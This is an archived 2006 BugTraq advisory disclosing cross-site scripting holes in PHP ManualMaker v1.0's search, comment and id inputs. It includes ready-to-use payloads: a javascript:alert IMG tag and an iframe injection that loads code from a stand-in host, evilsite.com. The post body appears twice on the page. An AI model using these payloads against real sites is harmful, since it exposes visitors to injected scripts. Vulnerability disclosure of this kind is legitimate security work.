BugTraq
Back to list
|
Post reply
PHP ManualMaker v1.0
Jun 02 2006 03:07AM
luny youfucktard com
PHP ManualMaker v1.0
Homepage:
http://deltascripts.com/phpmanualmaker/
Effected files:
index.php
Search boxes
Comment boxes
XSS proof of concept:
Input in search or comment box:
">">">'><IMG SRC=javascript:alert('XSS')><""><'<"
XSS via URL injection of id:
http://www.example.com/manualmaker/index.php?print=1&id=<iframe src=http://evilsite.com/evilcode.html <
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Homepage:
http://deltascripts.com/phpmanualmaker/
Effected files:
index.php
Search boxes
Comment boxes
XSS proof of concept:
Input in search or comment box:
">">">'><IMG SRC=javascript:alert('XSS')><""><'<"
XSS via URL injection of id:
http://www.example.com/manualmaker/index.php?print=1&id=<iframe src=http://evilsite.com/evilcode.html <
[ reply ]